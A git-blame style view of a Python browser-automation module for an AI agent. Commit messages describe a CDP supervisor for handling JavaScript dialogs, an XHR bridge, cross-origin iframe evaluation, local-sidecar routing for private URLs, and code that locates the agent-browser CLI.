* browser.dialog_policy: 'must_respond' (new)
* browser.dialog_timeout_s: 300 (new)
No version bump — new keys deep-merge into existing browser section.
Deadlock fix in supervisor event dispatch:
* _on_dialog_opening and _on_target_attached used to await CDP calls
while the reader was still processing an event — but only the reader
can set the response Future, so the call timed out.
* Both now fire asyncio.create_task(...) so the reader stays pumping.
* auto_dismiss/auto_accept now actually close the dialog immediately.
Tests (tests/tools/test_browser_supervisor.py, 11 tests, real Chrome):
* supervisor start/snapshot
* main-frame alert detection + dismiss
* iframe.contentWindow alert
* prompt() with prompt_text reply
* respond with no pending dialog -> clean error
* auto_dismiss clears on event
* registry idempotency
* registry stop -> snapshot reports inactive
* browser_dialog tool no-supervisor error
* browser_dialog invalid action
* browser_dialog end-to-end via tool handler
xdist-safe: chrome_cdp fixture uses a per-worker port.
Skipped when google-chrome/chromium isn't installed.
* docs(browser): document browser_dialog tool + CDP supervisor
- user-guide/features/browser.md: new browser_dialog section with
workflow, availability gate, and dialog_policy table
- reference/tools-reference.md: row for browser_dialog, tool count
bumped 53 -> 54, browser tools count 11 -> 12
- reference/toolsets-reference.md: browser_dialog added to browser
toolset row with note on pending_dialogs / frame_tree snapshot fields
Full design doc lives at
developer-guide/browser-supervisor.md (committed earlier).
* fix(browser): reconnect loop + recent_dialogs for Browserbase visibility
Found via Browserbase E2E test that revealed two production-critical issues:
1. **Supervisor WebSocket drops when other clients disconnect.** Browserbase's
CDP proxy tears down our long-lived WebSocket whenever a short-lived
client (e.g. agent-browser CLI's per-command CDP connection) disconnects.
Fixed with a reconnecting _run loop that re-attaches with exponential
backoff on drops. _page_session_id and _child_sessions are reset on each
reconnect; pending_dialogs and frames are preserved across reconnects.
2. **Browserbase auto-dismisses dialogs server-side within ~10ms.** Their
Playwright-based CDP proxy dismisses alert/confirm/prompt before our
Page.handleJavaScriptDialog call can respond. So pending_dialogs is
empty by the time the agent reads a snapshot on Browserbase.
Added a recent_dialogs ring buffer (capacity 20) that retains a
DialogRecord for every dialog that opened, with a closed_by tag:
* 'agent' — agent called browser_dialog
* 'auto_policy' — local auto_dismiss/auto_accept fired
* 'watchdog' — must_respond timeout auto-dismissed (300s default)
* 'remote' — browser/backend closed it on us (Browserbase)
Agents on Browserbase now see the dialog history with closed_by='remote'
so they at least know a dialog fired, even though they couldn't respond.
3. **Page.javascriptDialogClosed matching bug.** The event doesn't include a
'message' field (CDP spec has only 'result' and 'userInput') but our
_on_dialog_closed was matching on message. Fixed to match by session_id
+ oldest-first, with a safety assumption that only one dialog is in
flight per session (the JS thread is blocked while a dialog is up).
Docs + tests updated:
* browser.md: new availability matrix showing the three backends and
which mode (pending / recent / response) each supports
* developer-guide/browser-supervisor.md: three-field snapshot schema
with closed_by semantics
* test_browser_supervisor.py: +test_recent_dialogs_ring_buffer (12/12
passing against real Chrome)
E2E verified both backends:
* Local Chrome via /browser connect: detect + respond full workflow
(smoke_supervisor.py all 7 scenarios pass)
* Browserbase: detect via recent_dialogs with closed_by='remote'
(smoke_supervisor_browserbase_v2.py passes)
Camofox remains out of scope (REST-only, no CDP) — tracked for
upstream PR 3.
* feat(browser): XHR bridge for dialog response on Browserbase (FIXED)
Browserbase's CDP proxy auto-dismisses native JS dialogs within ~10ms, so
Page.handleJavaScriptDialog calls lose the race. Solution: bypass native
dialogs entirely.
The supervisor now injects Page.addScriptToEvaluateOnNewDocument with a
JavaScript override for window.alert/confirm/prompt. Those overrides
perform a synchronous XMLHttpRequest to a magic host
('hermes-dialog-bridge.invalid'). We intercept those XHRs via Fetch.enable
with a requestStage=Request pattern.
Flow when a page calls alert('hi'):
1. window.alert override intercepts, builds XHR GET to
http://hermes-dialog-bridge.invalid/?kind=alert&message=hi
2. Sync XHR blocks the page's JS thread (mirrors real dialog semantics)
3. Fetch.requestPaused fires on our WebSocket; supervisor surfaces
it as a pending dialog with bridge_request_id set
4. Agent reads pending_dialogs from browser_snapshot, calls browser_dialog
5. Supervisor calls Fetch.fulfillRequest with JSON body:
{accept: true|false, prompt_text: '...', dialog_id: 'd-N'}
6. The injected script parses the body, returns the appropriate value
from the override (undefined for alert, bool for confirm, string|null
for prompt)
This works identically on Browserbase AND local Chrome — no native dialog
ever fires, so Browserbase's auto-dismiss has nothing to race. Dialog
policies (must_respond / auto_dismiss / auto_accept) all still work.
Bridge is installed on every attached session (main page + OOPIF child
sessions) so iframe dialogs are captured too.
Native-dialog path kept as a fallback for backends that don't auto-dismiss
(so a page that somehow bypasses our override — e.g. iframes that load
after Fetch.enable but before the init-script runs — still gets observed
via Page.javascriptDialogOpening).
E2E VERIFIED:
* Local Chrome: 13/13 pytest tests green (12 original + new
test_bridge_captures_prompt_and_returns_reply_text that asserts
window.__ret === 'AGENT-SUPPLIED-REPLY' after agent responds)
* Browserbase: smoke_bb_bridge_v2.py runs 4/4 PASS:
- alert('BB-ALERT-MSG') dismiss → page.alert_ret = undefined ✓
- prompt('BB-PROMPT-MSG', 'default-xyz') accept with 'AGENT-REPLY'
→ page.prompt_ret === 'AGENT-REPLY' ✓
- confirm('BB-CONFIRM-MSG') accept → page.confirm_ret === true ✓
- confirm('BB-CONFIRM-MSG') dismiss → page.confirm_ret === false ✓
Docs updated in browser.md and developer-guide/browser-supervisor.md —
availability matrix now shows Browserbase at full parity with local
Chrome for both detection and response.
* feat(browser): cross-origin iframe interaction via browser_cdp(frame_id=...)
Adds iframe interaction to the CDP supervisor PR (was queued as PR 2).
Design: browser_cdp gets an optional frame_id parameter. When set, the
tool looks up the frame in the supervisor's frame_tree, grabs its child
cdp_session_id (OOPIF session), and dispatches the CDP call through the
supervisor's already-connected WebSocket via run_coroutine_threadsafe.
Why not stateless: on Browserbase, each fresh browser_cdp WebSocket
must re-negotiate against a signed connectUrl. The session info carries
a specific URL that can expire while the supervisor's long-lived
connection stays valid. Routing via the supervisor sidesteps this.
Agent workflow:
1. browser_snapshot → frame_tree.children[] shows OOPIFs with is_oopif=true
2. browser_cdp(method='Runtime.evaluate', frame_id=<OOPIF frame_id>,
params={'expression': 'document.title', 'returnByValue': True})
3. Supervisor dispatches the call on the OOPIF's child session
Supervisor state fixes needed along the way:
* _on_frame_detached now skips reason='swap' (frame migrating processes)
* _on_frame_detached also skips when the frame is an OOPIF with a live
child session — Browserbase fires spurious remove events when a
same-origin iframe gets promoted to OOPIF
* _on_target_detached clears cdp_session_id but KEEPS the frame record
so the agent still sees the OOPIF in frame_tree during transient
session flaps
E2E VERIFIED on Browserbase (smoke_bb_iframe_agent_path.py):
browser_cdp(method='Runtime.evaluate',
params={'expression': 'document.title', 'returnByValue': True},
frame_id=<OOPIF>)
→ {'success': True, 'result': {'value': 'Example Domain'}}
The iframe is <iframe src='https://example.com/'> inside a top-level
data: URL page on a real Browserbase session. The agent Runtime.evaluates
INSIDE the cross-origin iframe and gets example.com's title back.
Tests (tests/tools/test_browser_supervisor.py — 16 pass total):
* test_browser_cdp_frame_id_routes_via_supervisor — injects fake OOPIF,
verifies routing via supervisor, Runtime.evaluate returns 1+1=2
* test_browser_cdp_frame_id_missing_supervisor — clean error when no
supervisor attached
* test_browser_cdp_frame_id_not_in_frame_tree — clean error on bad
frame_id
Docs (browser.md and developer-guide/browser-supervisor.md) updated with
the iframe workflow, availability matrix now shows OOPIF eval as shipped
for local Chrome + Browserbase.
* test(browser): real-OOPIF E2E verified manually + chrome_cdp uses --site-per-process
When asked 'did you test the iframe stuff' I had only done a mocked
pytest (fake injected OOPIF) plus a Browserbase E2E. Closed the
local-Chrome real-OOPIF gap by writing /tmp/dialog-iframe-test/
smoke_local_oopif.py:
* 2 http servers on different hostnames (localhost:18905 + 127.0.0.1:18906)
* Chrome with --site-per-process so the cross-origin iframe becomes a
real OOPIF in its own process
* Navigate, find OOPIF in supervisor.frame_tree, call
browser_cdp(method='Runtime.evaluate', frame_id=<OOPIF>) which routes
through the supervisor's child session
* Asserts iframe document.title === 'INNER-FRAME-XYZ' (from the
inner page, retrieved via OOPIF eval)
PASSED on 2026-04-23.
Tried to embed this as a pytest but hit an asyncio version quirk between
venv (3.11) and the system python (3.13) — Page.navigate hangs in the
pytest harness but works in standalone. Left a self-documenting skip
test that points to the smoke script + describes the verification.
chrome_cdp fixture now passes --site-per-process so future iframe tests
can rely on OOPIF behavior.
Result: 16 pass + 1 documented-skip = 17 tests in
tests/tools/test_browser_supervisor.py.
* docs(browser): add dialog_policy + dialog_timeout_s to configuration.md, fix tool count
Pre-merge docs audit revealed two gaps:
1. user-guide/configuration.md browser config example was missing the
two new dialog_* knobs. Added with a short table explaining
must_respond / auto_dismiss / auto_accept semantics and a link to
the feature page for the full workflow.
2. reference/tools-reference.md header said '54 built-in tools' — real
count on main is 54, this branch adds browser_dialog so it's 55.
Fixed the header. (browser count was already correctly bumped
11 -> 12 in the earlier docs commit.)
No code changes.
2026-04-23 22:23:37 -07:00
# Lazy-start the CDP supervisor now that the session exists (if the
# backend surfaces a CDP URL via override or session_info["cdp_url"]).
# Idempotent; swallows errors. See _ensure_cdp_supervisor for details.
feat(browser): auto-spawn local Chromium for LAN/localhost URLs in cloud mode (#16136)
When a cloud browser provider (Browserbase / Browser-Use / Firecrawl) is
configured, browser_navigate now transparently spawns a local Chromium
sidecar for URLs whose host resolves to a private/loopback/LAN address
(localhost, 127.0.0.1, 192.168.x.x, 10.x.x.x, *.local, *.lan, *.internal,
::1, 169.254.x.x). Public URLs continue to use the cloud provider in the
same conversation.
Previously, setting BROWSERBASE_API_KEY / cloud_provider: browserbase
pinned the whole tool to cloud for the process — localhost URLs were
either SSRF-blocked (default) or sent to Browserbase (where they 404'd
because the cloud can't reach your LAN). Users who wanted 'cloud for
public, local for localhost' had no way to express it short of toggling
providers mid-session.
Implementation uses a composite session key scheme: the bare task_id
serves the cloud session, and a '{task_id}::local' sidecar serves the
local Chromium. _last_active_session_key[task_id] tracks which of the
two served the most recent nav so snapshot/click/fill/etc. hit the
correct one. cleanup_browser(bare_task_id) reaps both.
Feature is on by default. Opt out via:
browser:
auto_local_for_private_urls: false
The cloud provider never sees private URLs. Post-redirect SSRF guard
is preserved: redirects from public onto private addresses still block.
2026-04-26 09:57:58 -07:00
# Skip for local sidecars — they have no CDP URL.
if not force_local :
_ensure_cdp_supervisor ( task_id )
feat(browser): CDP supervisor — dialog detection + response + cross-origin iframe eval (#14540)
* docs: browser CDP supervisor design (for upcoming PR)
Design doc ahead of implementation — dialog + iframe detection/interaction
via a persistent CDP supervisor. Covers backend capability matrix (verified
live 2026-04-23), architecture, lifecycle, policy, agent surface, PR split,
non-goals, and test plan.
Supersedes #12550.
No code changes in this commit.
* feat(browser): add persistent CDP supervisor for dialog + frame detection
Single persistent CDP WebSocket per Hermes task_id that subscribes to
Page/Runtime/Target events and maintains thread-safe state for pending
dialogs, frame tree, and console errors.
Supervisor lives in its own daemon thread running an asyncio loop;
external callers use sync API (snapshot(), respond_to_dialog()) that
bridges onto the loop.
Auto-attaches to OOPIF child targets via Target.setAutoAttach{flatten:true}
and enables Page+Runtime on each so iframe-origin dialogs surface through
the same supervisor.
Dialog policies: must_respond (default, 300s safety timeout),
auto_dismiss, auto_accept.
Frame tree capped at 30 entries + OOPIF depth 2 to keep snapshot
payloads bounded on ad-heavy pages.
E2E verified against real Chrome via smoke test — detects + responds
to main-frame alerts, iframe-contentWindow alerts, preserves frame
tree, graceful no-dialog error path, clean shutdown.
No agent-facing tool wiring in this commit (comes next).
* feat(browser): add browser_dialog tool wired to CDP supervisor
Agent-facing response-only tool. Schema:
action: 'accept' | 'dismiss' (required)
prompt_text: response for prompt() dialogs (optional)
dialog_id: disambiguate when multiple dialogs queued (optional)
Handler:
SUPERVISOR_REGISTRY.get(task_id).respond_to_dialog(...)
check_fn shares _browser_cdp_check with browser_cdp so both surface and
hide together. When no supervisor is attached (Camofox, default
Playwright, or no browser session started yet), tool is hidden; if
somehow invoked it returns a clear error pointing the agent to
browser_navigate / /browser connect.
Registered in _HERMES_CORE_TOOLS and the browser / hermes-acp /
hermes-api-server toolsets alongside browser_cdp.
* feat(browser): wire CDP supervisor into session lifecycle + browser_snapshot
Supervisor lifecycle:
* _get_session_info lazy-starts the supervisor after a session row is
materialized — covers every backend code path (Browserbase, cdp_url
override, /browser connect, future providers) with one hook.
* cleanup_browser(task_id) stops the supervisor for that task first
(before the backend tears down CDP).
* cleanup_all_browsers() calls SUPERVISOR_REGISTRY.stop_all().
* /browser connect eagerly starts the supervisor for task 'default'
so the first snapshot already shows pending_dialogs.
* /browser disconnect stops the supervisor.
CDP URL resolution for the supervisor:
1. BROWSER_CDP_URL / browser.cdp_url override.
2. Fallback: session_info['cdp_url'] from cloud providers (Browserbase).
browser_snapshot merges supervisor state (pending_dialogs + frame_tree)
into its JSON output when a supervisor is active — the agent reads
pending_dialogs from the snapshot it already requests, then calls
browser_dialog to respond. No extra tool surface.
Config defaults:
* browser.dialog_policy: 'must_respond' (new)
* browser.dialog_timeout_s: 300 (new)
No version bump — new keys deep-merge into existing browser section.
Deadlock fix in supervisor event dispatch:
* _on_dialog_opening and _on_target_attached used to await CDP calls
while the reader was still processing an event — but only the reader
can set the response Future, so the call timed out.
* Both now fire asyncio.create_task(...) so the reader stays pumping.
* auto_dismiss/auto_accept now actually close the dialog immediately.
Tests (tests/tools/test_browser_supervisor.py, 11 tests, real Chrome):
* supervisor start/snapshot
* main-frame alert detection + dismiss
* iframe.contentWindow alert
* prompt() with prompt_text reply
* respond with no pending dialog -> clean error
* auto_dismiss clears on event
* registry idempotency
* registry stop -> snapshot reports inactive
* browser_dialog tool no-supervisor error
* browser_dialog invalid action
* browser_dialog end-to-end via tool handler
xdist-safe: chrome_cdp fixture uses a per-worker port.
Skipped when google-chrome/chromium isn't installed.
* docs(browser): document browser_dialog tool + CDP supervisor
- user-guide/features/browser.md: new browser_dialog section with
workflow, availability gate, and dialog_policy table
- reference/tools-reference.md: row for browser_dialog, tool count
bumped 53 -> 54, browser tools count 11 -> 12
- reference/toolsets-reference.md: browser_dialog added to browser
toolset row with note on pending_dialogs / frame_tree snapshot fields
Full design doc lives at
developer-guide/browser-supervisor.md (committed earlier).
* fix(browser): reconnect loop + recent_dialogs for Browserbase visibility
Found via Browserbase E2E test that revealed two production-critical issues:
1. **Supervisor WebSocket drops when other clients disconnect.** Browserbase's
CDP proxy tears down our long-lived WebSocket whenever a short-lived
client (e.g. agent-browser CLI's per-command CDP connection) disconnects.
Fixed with a reconnecting _run loop that re-attaches with exponential
backoff on drops. _page_session_id and _child_sessions are reset on each
reconnect; pending_dialogs and frames are preserved across reconnects.
2. **Browserbase auto-dismisses dialogs server-side within ~10ms.** Their
Playwright-based CDP proxy dismisses alert/confirm/prompt before our
Page.handleJavaScriptDialog call can respond. So pending_dialogs is
empty by the time the agent reads a snapshot on Browserbase.
Added a recent_dialogs ring buffer (capacity 20) that retains a
DialogRecord for every dialog that opened, with a closed_by tag:
* 'agent' — agent called browser_dialog
* 'auto_policy' — local auto_dismiss/auto_accept fired
* 'watchdog' — must_respond timeout auto-dismissed (300s default)
* 'remote' — browser/backend closed it on us (Browserbase)
Agents on Browserbase now see the dialog history with closed_by='remote'
so they at least know a dialog fired, even though they couldn't respond.
3. **Page.javascriptDialogClosed matching bug.** The event doesn't include a
'message' field (CDP spec has only 'result' and 'userInput') but our
_on_dialog_closed was matching on message. Fixed to match by session_id
+ oldest-first, with a safety assumption that only one dialog is in
flight per session (the JS thread is blocked while a dialog is up).
Docs + tests updated:
* browser.md: new availability matrix showing the three backends and
which mode (pending / recent / response) each supports
* developer-guide/browser-supervisor.md: three-field snapshot schema
with closed_by semantics
* test_browser_supervisor.py: +test_recent_dialogs_ring_buffer (12/12
passing against real Chrome)
E2E verified both backends:
* Local Chrome via /browser connect: detect + respond full workflow
(smoke_supervisor.py all 7 scenarios pass)
* Browserbase: detect via recent_dialogs with closed_by='remote'
(smoke_supervisor_browserbase_v2.py passes)
Camofox remains out of scope (REST-only, no CDP) — tracked for
upstream PR 3.
* feat(browser): XHR bridge for dialog response on Browserbase (FIXED)
Browserbase's CDP proxy auto-dismisses native JS dialogs within ~10ms, so
Page.handleJavaScriptDialog calls lose the race. Solution: bypass native
dialogs entirely.
The supervisor now injects Page.addScriptToEvaluateOnNewDocument with a
JavaScript override for window.alert/confirm/prompt. Those overrides
perform a synchronous XMLHttpRequest to a magic host
('hermes-dialog-bridge.invalid'). We intercept those XHRs via Fetch.enable
with a requestStage=Request pattern.
Flow when a page calls alert('hi'):
1. window.alert override intercepts, builds XHR GET to
http://hermes-dialog-bridge.invalid/?kind=alert&message=hi
2. Sync XHR blocks the page's JS thread (mirrors real dialog semantics)
3. Fetch.requestPaused fires on our WebSocket; supervisor surfaces
it as a pending dialog with bridge_request_id set
4. Agent reads pending_dialogs from browser_snapshot, calls browser_dialog
5. Supervisor calls Fetch.fulfillRequest with JSON body:
{accept: true|false, prompt_text: '...', dialog_id: 'd-N'}
6. The injected script parses the body, returns the appropriate value
from the override (undefined for alert, bool for confirm, string|null
for prompt)
This works identically on Browserbase AND local Chrome — no native dialog
ever fires, so Browserbase's auto-dismiss has nothing to race. Dialog
policies (must_respond / auto_dismiss / auto_accept) all still work.
Bridge is installed on every attached session (main page + OOPIF child
sessions) so iframe dialogs are captured too.
Native-dialog path kept as a fallback for backends that don't auto-dismiss
(so a page that somehow bypasses our override — e.g. iframes that load
after Fetch.enable but before the init-script runs — still gets observed
via Page.javascriptDialogOpening).
E2E VERIFIED:
* Local Chrome: 13/13 pytest tests green (12 original + new
test_bridge_captures_prompt_and_returns_reply_text that asserts
window.__ret === 'AGENT-SUPPLIED-REPLY' after agent responds)
* Browserbase: smoke_bb_bridge_v2.py runs 4/4 PASS:
- alert('BB-ALERT-MSG') dismiss → page.alert_ret = undefined ✓
- prompt('BB-PROMPT-MSG', 'default-xyz') accept with 'AGENT-REPLY'
→ page.prompt_ret === 'AGENT-REPLY' ✓
- confirm('BB-CONFIRM-MSG') accept → page.confirm_ret === true ✓
- confirm('BB-CONFIRM-MSG') dismiss → page.confirm_ret === false ✓
Docs updated in browser.md and developer-guide/browser-supervisor.md —
availability matrix now shows Browserbase at full parity with local
Chrome for both detection and response.
* feat(browser): cross-origin iframe interaction via browser_cdp(frame_id=...)
Adds iframe interaction to the CDP supervisor PR (was queued as PR 2).
Design: browser_cdp gets an optional frame_id parameter. When set, the
tool looks up the frame in the supervisor's frame_tree, grabs its child
cdp_session_id (OOPIF session), and dispatches the CDP call through the
supervisor's already-connected WebSocket via run_coroutine_threadsafe.
Why not stateless: on Browserbase, each fresh browser_cdp WebSocket
must re-negotiate against a signed connectUrl. The session info carries
a specific URL that can expire while the supervisor's long-lived
connection stays valid. Routing via the supervisor sidesteps this.
Agent workflow:
1. browser_snapshot → frame_tree.children[] shows OOPIFs with is_oopif=true
2. browser_cdp(method='Runtime.evaluate', frame_id=<OOPIF frame_id>,
params={'expression': 'document.title', 'returnByValue': True})
3. Supervisor dispatches the call on the OOPIF's child session
Supervisor state fixes needed along the way:
* _on_frame_detached now skips reason='swap' (frame migrating processes)
* _on_frame_detached also skips when the frame is an OOPIF with a live
child session — Browserbase fires spurious remove events when a
same-origin iframe gets promoted to OOPIF
* _on_target_detached clears cdp_session_id but KEEPS the frame record
so the agent still sees the OOPIF in frame_tree during transient
session flaps
E2E VERIFIED on Browserbase (smoke_bb_iframe_agent_path.py):
browser_cdp(method='Runtime.evaluate',
params={'expression': 'document.title', 'returnByValue': True},
frame_id=<OOPIF>)
→ {'success': True, 'result': {'value': 'Example Domain'}}
The iframe is <iframe src='https://example.com/'> inside a top-level
data: URL page on a real Browserbase session. The agent Runtime.evaluates
INSIDE the cross-origin iframe and gets example.com's title back.
Tests (tests/tools/test_browser_supervisor.py — 16 pass total):
* test_browser_cdp_frame_id_routes_via_supervisor — injects fake OOPIF,
verifies routing via supervisor, Runtime.evaluate returns 1+1=2
* test_browser_cdp_frame_id_missing_supervisor — clean error when no
supervisor attached
* test_browser_cdp_frame_id_not_in_frame_tree — clean error on bad
frame_id
Docs (browser.md and developer-guide/browser-supervisor.md) updated with
the iframe workflow, availability matrix now shows OOPIF eval as shipped
for local Chrome + Browserbase.
* test(browser): real-OOPIF E2E verified manually + chrome_cdp uses --site-per-process
When asked 'did you test the iframe stuff' I had only done a mocked
pytest (fake injected OOPIF) plus a Browserbase E2E. Closed the
local-Chrome real-OOPIF gap by writing /tmp/dialog-iframe-test/
smoke_local_oopif.py:
* 2 http servers on different hostnames (localhost:18905 + 127.0.0.1:18906)
* Chrome with --site-per-process so the cross-origin iframe becomes a
real OOPIF in its own process
* Navigate, find OOPIF in supervisor.frame_tree, call
browser_cdp(method='Runtime.evaluate', frame_id=<OOPIF>) which routes
through the supervisor's child session
* Asserts iframe document.title === 'INNER-FRAME-XYZ' (from the
inner page, retrieved via OOPIF eval)
PASSED on 2026-04-23.
Tried to embed this as a pytest but hit an asyncio version quirk between
venv (3.11) and the system python (3.13) — Page.navigate hangs in the
pytest harness but works in standalone. Left a self-documenting skip
test that points to the smoke script + describes the verification.
chrome_cdp fixture now passes --site-per-process so future iframe tests
can rely on OOPIF behavior.
Result: 16 pass + 1 documented-skip = 17 tests in
tests/tools/test_browser_supervisor.py.
* docs(browser): add dialog_policy + dialog_timeout_s to configuration.md, fix tool count
Pre-merge docs audit revealed two gaps:
1. user-guide/configuration.md browser config example was missing the
two new dialog_* knobs. Added with a short table explaining
must_respond / auto_dismiss / auto_accept semantics and a link to
the feature page for the full workflow.
2. reference/tools-reference.md header said '54 built-in tools' — real
count on main is 54, this branch adds browser_dialog so it's 55.
Fixed the header. (browser count was already correctly bumped
11 -> 12 in the earlier docs commit.)
No code changes.
2026-04-23 22:23:37 -07:00
2026-01-29 06:10:24 +00:00
return session_info
def _find_agent_browser ( ) - > str :
"""
Find the agent - browser CLI executable .
2026-03-14 11:34:31 -07:00
2026-03-23 22:45:55 -07:00
Checks in order : current PATH , Homebrew / common bin dirs , Hermes - managed
node , local node_modules / . bin / , npx fallback .
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Returns :
Path to agent - browser executable
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Raises :
FileNotFoundError : If agent - browser is not installed
"""
fix(browser): hardening — dead code, caching, scroll perf, security, thread safety
Salvaged from PR #7276 (hardening-only subset; excluded 6 new tools
and unrelated scope additions from the contributor's commit).
- Remove dead DEFAULT_SESSION_TIMEOUT and unregistered browser_close schema
- Fix _camofox_eval wrong call signatures (_ensure_tab, _post args)
- Cache _find_agent_browser, _get_command_timeout, _discover_homebrew_node_dirs
- Replace 5x subprocess scroll loop with single pixel-arg call
- URL-decode before secret exfiltration check (bypass prevention)
- Protect _recording_sessions with _cleanup_lock (thread safety)
- Return failure on empty stdout instead of silent success
- Structure-aware _truncate_snapshot (cut at line boundaries)
Follow-up improvements over contributor's original:
- Move _EMPTY_OK_COMMANDS to module-level frozenset (avoid per-call allocation)
- Fix list+tuple concat in _run_browser_command PATH construction
- Update test_browser_homebrew_paths.py for tuple returns and cache fixtures
Co-authored-by: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com>
Closes #7168, closes #7171, closes #7172, closes #7173
2026-04-10 13:00:23 -07:00
global _cached_agent_browser , _agent_browser_resolved
if _agent_browser_resolved :
if _cached_agent_browser is None :
raise FileNotFoundError (
" agent-browser CLI not found (cached). Install it with: "
f " { _browser_install_hint ( ) } \n "
" Or run ' npm install ' in the repo root to install locally. \n "
" Or ensure npx is available in your PATH. "
)
return _cached_agent_browser
# Note: _agent_browser_resolved is set at each return site below
# (not before the search) to prevent a race where a concurrent thread
# sees resolved=True but _cached_agent_browser is still None.
2026-02-20 23:40:42 -08:00
2026-02-09 04:35:25 +00:00
# Check if it's in PATH (global install)
2026-01-29 06:10:24 +00:00
which_result = shutil . which ( " agent-browser " )
if which_result :
fix(browser): hardening — dead code, caching, scroll perf, security, thread safety
Salvaged from PR #7276 (hardening-only subset; excluded 6 new tools
and unrelated scope additions from the contributor's commit).
- Remove dead DEFAULT_SESSION_TIMEOUT and unregistered browser_close schema
- Fix _camofox_eval wrong call signatures (_ensure_tab, _post args)
- Cache _find_agent_browser, _get_command_timeout, _discover_homebrew_node_dirs
- Replace 5x subprocess scroll loop with single pixel-arg call
- URL-decode before secret exfiltration check (bypass prevention)
- Protect _recording_sessions with _cleanup_lock (thread safety)
- Return failure on empty stdout instead of silent success
- Structure-aware _truncate_snapshot (cut at line boundaries)
Follow-up improvements over contributor's original:
- Move _EMPTY_OK_COMMANDS to module-level frozenset (avoid per-call allocation)
- Fix list+tuple concat in _run_browser_command PATH construction
- Update test_browser_homebrew_paths.py for tuple returns and cache fixtures
Co-authored-by: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com>
Closes #7168, closes #7171, closes #7172, closes #7173
2026-04-10 13:00:23 -07:00
_cached_agent_browser = which_result
_agent_browser_resolved = True
2026-01-29 06:10:24 +00:00
return which_result
2026-03-23 22:45:55 -07:00
2026-04-14 16:47:36 -07:00
# Build an extended search PATH including Hermes-managed Node, macOS
# versioned Homebrew installs, and fallback system dirs like Termux.
extended_path = _merge_browser_path ( " " )
if extended_path :
2026-03-23 22:45:55 -07:00
which_result = shutil . which ( " agent-browser " , path = extended_path )
if which_result :
fix(browser): hardening — dead code, caching, scroll perf, security, thread safety
Salvaged from PR #7276 (hardening-only subset; excluded 6 new tools
and unrelated scope additions from the contributor's commit).
- Remove dead DEFAULT_SESSION_TIMEOUT and unregistered browser_close schema
- Fix _camofox_eval wrong call signatures (_ensure_tab, _post args)
- Cache _find_agent_browser, _get_command_timeout, _discover_homebrew_node_dirs
- Replace 5x subprocess scroll loop with single pixel-arg call
- URL-decode before secret exfiltration check (bypass prevention)
- Protect _recording_sessions with _cleanup_lock (thread safety)
- Return failure on empty stdout instead of silent success
- Structure-aware _truncate_snapshot (cut at line boundaries)
Follow-up improvements over contributor's original:
- Move _EMPTY_OK_COMMANDS to module-level frozenset (avoid per-call allocation)
- Fix list+tuple concat in _run_browser_command PATH construction
- Update test_browser_homebrew_paths.py for tuple returns and cache fixtures
Co-authored-by: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com>
Closes #7168, closes #7171, closes #7172, closes #7173
2026-04-10 13:00:23 -07:00
_cached_agent_browser = which_result
_agent_browser_resolved = True
2026-03-23 22:45:55 -07:00
return which_result
2026-02-09 04:35:25 +00:00
# Check local node_modules/.bin/ (npm install in repo root)
repo_root = Path ( __file__ ) . parent . parent
local_bin = repo_root / " node_modules " / " .bin " / " agent-browser "
if local_bin . exists ( ) :
fix(browser): hardening — dead code, caching, scroll perf, security, thread safety
Salvaged from PR #7276 (hardening-only subset; excluded 6 new tools
and unrelated scope additions from the contributor's commit).
- Remove dead DEFAULT_SESSION_TIMEOUT and unregistered browser_close schema
- Fix _camofox_eval wrong call signatures (_ensure_tab, _post args)
- Cache _find_agent_browser, _get_command_timeout, _discover_homebrew_node_dirs
- Replace 5x subprocess scroll loop with single pixel-arg call
- URL-decode before secret exfiltration check (bypass prevention)
- Protect _recording_sessions with _cleanup_lock (thread safety)
- Return failure on empty stdout instead of silent success
- Structure-aware _truncate_snapshot (cut at line boundaries)
Follow-up improvements over contributor's original:
- Move _EMPTY_OK_COMMANDS to module-level frozenset (avoid per-call allocation)
- Fix list+tuple concat in _run_browser_command PATH construction
- Update test_browser_homebrew_paths.py for tuple returns and cache fixtures
Co-authored-by: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com>
Closes #7168, closes #7171, closes #7172, closes #7173
2026-04-10 13:00:23 -07:00
_cached_agent_browser = str ( local_bin )
_agent_browser_resolved = True
return _cached_agent_browser
2026-03-14 11:34:31 -07:00
2026-04-14 16:47:36 -07:00
# Check common npx locations (also search the extended fallback PATH)
2026-01-29 06:10:24 +00:00
npx_path = shutil . which ( " npx " )
2026-04-14 16:47:36 -07:00
if not npx_path and extended_path :
npx_path = shutil . which ( " npx " , path = extended_path )
2026-01-29 06:10:24 +00:00
if npx_path :
fix(browser): hardening — dead code, caching, scroll perf, security, thread safety
Salvaged from PR #7276 (hardening-only subset; excluded 6 new tools
and unrelated scope additions from the contributor's commit).
- Remove dead DEFAULT_SESSION_TIMEOUT and unregistered browser_close schema
- Fix _camofox_eval wrong call signatures (_ensure_tab, _post args)
- Cache _find_agent_browser, _get_command_timeout, _discover_homebrew_node_dirs
- Replace 5x subprocess scroll loop with single pixel-arg call
- URL-decode before secret exfiltration check (bypass prevention)
- Protect _recording_sessions with _cleanup_lock (thread safety)
- Return failure on empty stdout instead of silent success
- Structure-aware _truncate_snapshot (cut at line boundaries)
Follow-up improvements over contributor's original:
- Move _EMPTY_OK_COMMANDS to module-level frozenset (avoid per-call allocation)
- Fix list+tuple concat in _run_browser_command PATH construction
- Update test_browser_homebrew_paths.py for tuple returns and cache fixtures
Co-authored-by: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com>
Closes #7168, closes #7171, closes #7172, closes #7173
2026-04-10 13:00:23 -07:00
_cached_agent_browser = " npx agent-browser "
_agent_browser_resolved = True
return _cached_agent_browser
2026-03-14 11:34:31 -07:00
fix(browser): hardening — dead code, caching, scroll perf, security, thread safety
Salvaged from PR #7276 (hardening-only subset; excluded 6 new tools
and unrelated scope additions from the contributor's commit).
- Remove dead DEFAULT_SESSION_TIMEOUT and unregistered browser_close schema
- Fix _camofox_eval wrong call signatures (_ensure_tab, _post args)
- Cache _find_agent_browser, _get_command_timeout, _discover_homebrew_node_dirs
- Replace 5x subprocess scroll loop with single pixel-arg call
- URL-decode before secret exfiltration check (bypass prevention)
- Protect _recording_sessions with _cleanup_lock (thread safety)
- Return failure on empty stdout instead of silent success
